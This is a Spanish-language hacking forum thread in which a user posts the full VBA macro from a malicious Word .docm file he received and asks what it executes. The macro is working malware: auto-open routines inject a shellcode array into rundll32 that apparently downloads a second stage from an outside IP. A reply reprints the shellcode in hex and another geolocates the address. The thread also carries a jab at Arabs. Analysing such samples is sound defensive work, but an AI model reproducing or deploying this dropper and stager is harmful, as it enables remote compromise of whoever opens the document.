Alguien intentó infectarme con un documento de word, usando macros, pero da la casualidad que yo no uso office lol

El archivo tiene extension documentito.docm el macro en cuestion es este. cual es el comando que ejecuta?

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    myArray = Array(252, 232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, _
124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, _
211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, 207, 13, 1, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, _
88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, _
95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _
83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 188, 1, 0, 0, 232, 120, 0, 0, 0, 47, 75, 57, 49, 65, 102, 0, 80, _
104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, 0, 2, 96, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, _
83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 10, 79, 117, 237, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, _
0, 104, 0, 0, 64, 0, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, _
255, 213, 133, 192, 116, 205, 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 95, 232, 137, 255, 255, 255, 51, 55, 46, 56, 46, 49, 49, 53, 46, 49, _
57, 53, 0)
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If

    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Tus amigos los árabes...

Yo ni a compu llego ya
Soy lo que soy gracias a que ustedes son lo que soN

Skype: bibetto.hax
KHC escribió:Huevo de pascua, from russia with love to @adwind!
jajajaj que bueno, que grandes los rusos xd
Soy un camaleón, en tu cama, leona ♪
me quede curioso para saber como identificaste que es un server?
Imagen
 
"La posibilidad de realizar un sueño es lo que hace que la vida sea interesante"
Solitario escribió:me quede curioso para saber como identificaste que es un server?
Yo jamas dije que fue un server...
1337 & culture!
El shellcode que intentó colarte es muy similar a este:
一些stager shellcode
Aquí dejo el shellcode en hex para que lo analizeis:

Código: Seleccionar todo

FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20 01 D3 8B 49 18 E3 3A 49 8B 34 8B 01 D6 31 FF AC C1 CF 0D 01 C7 38 E0 75 F6 03 7D F8 3B 7D 24 75 E4 58 8B 58 24 01 D3 66 8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24 24 5B 5B 61 59 5A 51 FF E0 5F 5F 5A 8B 12 EB 8D 5D 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 FF D5 31 DB 53 53 53 53 53 68 3A 56 79 A7 FF D5 53 53 6A 03 53 53 68 BC 01 00 00 E8 78 00 00 00 2F 4B 39 31 41 66 00 50 68 57 89 9F C6 FF D5 89 C6 53 68 00 02 60 84 53 53 53 57 53 56 68 EB 55 2E 3B FF D5 96 6A 0A 5F 53 53 53 53 56 68 2D 06 18 7B FF D5 85 C0 75 0A 4F 75 ED 68 F0 B5 A2 56 FF D5 6A 40 68 00 10 00 00 68 00 00 40 00 53 68 58 A4 53 E5 FF D5 93 53 53 89 E7 57 68 00 20 00 00 53 56 68 12 96 89 E2 FF D5 85 C0 74 CD 8B 07 01 C3 85 C0 75 E5 58 C3 5F E8 89 FF FF FF 33 37 2E 38 2E 31 31 35 2E 31 39 35 00
Un saludo bro!
github.com/Slek-Z
Yo consegui esto:

IP address: 37.8.115.195
ISP: Hadara
City: Ramallah
Country: Palestinian Territory (PS) flag
latitude: 31.9
longitude: 35.2
Imagen
encontre esta imagen (quizas sean memes codificados)
Imagen

descubri que alguna cadenas numericas estan dentro del array
no se como tratar las com,as?
paresco malo ,pero soy bueno
KHC escribió:Huevo de pascua, from russia with love to @adwind!
russia? por un simple macro? si en foros como hf, lo venden a 10 dolares l0lzzz, si fuera from rusia, no seria esta shit.
@Lucho, no por ser rusos son todo buenos... como en cualquier lado existe gente buena y mala. Y bueno ya lo de ocultar la conexión cada quien, rusia, usa, palestina, proxy, proxy, proxy, n+1.
1337 & culture!
Responder

Volver a “Mensajes Entre Nosotros”